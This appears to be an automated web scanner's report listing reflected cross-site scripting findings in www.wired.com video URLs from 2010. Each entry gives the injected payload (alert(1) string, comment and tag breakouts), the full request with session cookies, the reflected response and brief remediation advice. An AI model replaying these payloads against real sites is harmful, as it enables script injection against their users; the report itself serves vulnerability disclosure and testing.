The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d784a"-alert(1)-"7f75e25cfd6 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest/1815816633d784a"-alert(1)-"7f75e25cfd6/tron-legacy-clip-long-time/664849976001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:44:33 GMT Date: Mon, 22 Nov 2010 00:39:33 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106743
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e2288"-alert(1)-"25b0acd16bd was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest/1815816633/tron-legacy-clip-long-timee2288"-alert(1)-"25b0acd16bd/664849976001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:44:58 GMT Date: Mon, 22 Nov 2010 00:39:58 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106728
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4594d"-alert(1)-"7690f3a7e1f was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest/1815816633/tron-legacy-clip-long-time/6648499760014594d"-alert(1)-"7690f3a7e1f HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:45:10 GMT Date: Mon, 22 Nov 2010 00:40:10 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106682
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 1 is copied into an HTML comment. The payload e050c--><script>alert(1)</script>342fbb90a6d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /videoe050c--><script>alert(1)</script>342fbb90a6d/latest-videos/latest/1815816633/tron-legacy-clip-quorra-saves-sam/653193147001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29467 Vary: Accept-Encoding Cache-Control: max-age=286 Expires: Mon, 22 Nov 2010 00:47:00 GMT Date: Mon, 22 Nov 2010 00:42:14 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <!-- Exception message: URL not found: /videoe050c--><script>alert(1)</script>342fbb90a6d/latest-videos/latest/1815816633/tron-legacy-clip-quorra-saves-sam/653193147001 --> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cb01f"><a>19896930279 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /videocb01f"><a>19896930279/latest-videos/latest/1815816633/tron-legacy-clip-quorra-saves-sam/653193147001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29428 Vary: Accept-Encoding Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:46:30 GMT Date: Mon, 22 Nov 2010 00:41:30 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_videocb01f"><a>19896930279 ss_latest-videos c_latest"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3de52"><a>bb7b6c2ab13 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/latest-videos3de52"><a>bb7b6c2ab13/latest/1815816633/tron-legacy-clip-quorra-saves-sam/653193147001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=278 Expires: Mon, 22 Nov 2010 00:46:54 GMT Date: Mon, 22 Nov 2010 00:42:16 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106749
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_latest-videos3de52"><a>bb7b6c2ab13 c_latest"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a8927"-alert(1)-"0b73e10bb0b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videosa8927"-alert(1)-"0b73e10bb0b/latest/1815816633/tron-legacy-clip-quorra-saves-sam/653193147001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=293 Expires: Mon, 22 Nov 2010 00:48:08 GMT Date: Mon, 22 Nov 2010 00:43:15 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106778
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5a040"-alert(1)-"3f490dd9e9d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest5a040"-alert(1)-"3f490dd9e9d/1815816633/tron-legacy-clip-quorra-saves-sam/653193147001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=291 Expires: Mon, 22 Nov 2010 00:49:01 GMT Date: Mon, 22 Nov 2010 00:44:10 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106778
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 23bae"><a>bf20c8db554 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/latest-videos/latest23bae"><a>bf20c8db554/1815816633/tron-legacy-clip-quorra-saves-sam/653193147001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:48:17 GMT Date: Mon, 22 Nov 2010 00:43:17 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106767
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_latest-videos c_latest23bae"><a>bf20c8db554"> ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 65d68"-alert(1)-"8f64e6fcf0e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest/181581663365d68"-alert(1)-"8f64e6fcf0e/tron-legacy-clip-quorra-saves-sam/653193147001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:49:29 GMT Date: Mon, 22 Nov 2010 00:44:29 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106780
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9277e"-alert(1)-"0623ce045a was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest/1815816633/tron-legacy-clip-quorra-saves-sam9277e"-alert(1)-"0623ce045a/653193147001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=286 Expires: Mon, 22 Nov 2010 00:49:46 GMT Date: Mon, 22 Nov 2010 00:45:00 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106759
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4ff16"-alert(1)-"ae3d5100f07 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest/1815816633/tron-legacy-clip-quorra-saves-sam/6531931470014ff16"-alert(1)-"ae3d5100f07 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=297 Expires: Mon, 22 Nov 2010 00:50:06 GMT Date: Mon, 22 Nov 2010 00:45:09 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106780
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... script type="text/javascript">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d0e7f"><a>a8a93c134d1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /videod0e7f"><a>a8a93c134d1/latest-videos/latest/1815816633/wearable-computers-for-soldiers/660701101001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29426 Vary: Accept-Encoding Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:39:32 GMT Date: Mon, 22 Nov 2010 00:34:32 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_videod0e7f"><a>a8a93c134d1 ss_latest-videos c_latest"> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload 42deb--><script>alert(1)</script>ae5daa4176f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /video42deb--><script>alert(1)</script>ae5daa4176f/latest-videos/latest/1815816633/wearable-computers-for-soldiers/660701101001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29465 Vary: Accept-Encoding Cache-Control: max-age=272 Expires: Mon, 22 Nov 2010 00:40:28 GMT Date: Mon, 22 Nov 2010 00:35:56 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <!-- Exception message: URL not found: /video42deb--><script>alert(1)</script>ae5daa4176f/latest-videos/latest/1815816633/wearable-computers-for-soldiers/660701101001 --> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4da85"-alert(1)-"6a6abf3762a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos4da85"-alert(1)-"6a6abf3762a/latest/1815816633/wearable-computers-for-soldiers/660701101001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:41:32 GMT Date: Mon, 22 Nov 2010 00:36:32 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106715
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8948d"><a>bc9e08a046d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/latest-videos8948d"><a>bc9e08a046d/latest/1815816633/wearable-computers-for-soldiers/660701101001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:40:58 GMT Date: Mon, 22 Nov 2010 00:35:58 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106765
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_latest-videos8948d"><a>bc9e08a046d c_latest"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 43ccc"-alert(1)-"4125b11533d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest43ccc"-alert(1)-"4125b11533d/1815816633/wearable-computers-for-soldiers/660701101001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:42:32 GMT Date: Mon, 22 Nov 2010 00:37:32 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106779
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
